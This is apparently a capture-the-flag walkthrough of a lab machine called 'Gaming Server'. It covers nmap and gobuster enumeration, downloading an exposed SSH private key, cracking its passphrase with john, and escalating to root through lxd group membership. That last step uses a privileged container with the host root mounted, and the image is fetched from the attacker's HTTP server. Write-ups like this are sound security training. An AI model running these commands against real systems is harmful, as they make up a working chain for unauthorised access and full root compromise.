Gaming Server

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.9.5

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 22,80

• (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.9.5

Enumeration

Lets visit the website

Its a very functional website and nothing of interest at first glance so looking at the source code we see something interesting.

We have a username John, lets run gobuster to find hidden directories and pages.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5

We find two directories, the secret directory looks like it has more file so lets run a gobuster scan against it.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5/secret -x php,html,txt

Lets now go explore these directories

The uploads directory looks like directory that contains files that have been uploaded to the web server. Lets download the three files we see here.

wget http://10.10.9.5/uploads/<file-name>

Lets look at the files

First the dict.lst file: it looks like a password list. The second file is interesting to read but nothing that will help us and the third file is a meme.

Now lets look at the secret directory

Lets download this file

wget http://10.10.9.5/secret/secretKey

Lets read the file

It a rsa private key, so lets use ssh2john to get the password and then login through ssh

Exploitation

Lets use ssh2john to get the hash so that we can use john to crack the password

/usr/share/john/ssh2john.py secretKey > hash

Now lets crack the password

john --wordlist=/usr/share/wordlists/rockyou.txt hash

We found the password, so lets login through ssh, but first we have step

chmod 600 secretKey

And now we can login

ssh -i secretKey john@10.10.9.5

We can now read the user.txt file.

Privilege Escalation

Lets run the id command as we cannot run the sudo command as we do not have the password john.

id

Looking closely we can see that john is part of the lxd group. lxd is a Linux container manager that can be used to mount the root folder on the host machine. There is an article on this topic which talks about and shows us how to privilege escalate to root with the current permissions we have. I highly recommend reading the article as they explain it very well.

These are the steps that we have to follow. So first we need to download the alpine image on our machine as I think we can't download files on the victim machine directly , this can be found here.

git clone https://github.com/saghul/lxd-alpine-builder.git

Now we have to change directories into the directory we just cloned and then run build-alpine.

/build-alpine

After running it, a tar.gz file is created, now we have to transfer this to the victim machine so lets start a http server so that we can download the file using wget.

python3 -m http.server 8000

Now lets go to the victim machine and download the file

wget http://<your-ip>:8000/alpine-v3.13-x86_64-20210607_2042.tar.gz

First change directories into the tmp folder as we are going to place all temporary files here.

Now that the image is built, it can added as an image to LXD, we can do that by using this command

lxc image import alpine-v3.13-x86_64-20210607_2042.tar.gz --alias myimage

Lets check the list of images using this command

lxc image list

Now we need to use the following commands to escalate privileges to root

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

Now you are root and can read the root flag which you can find here.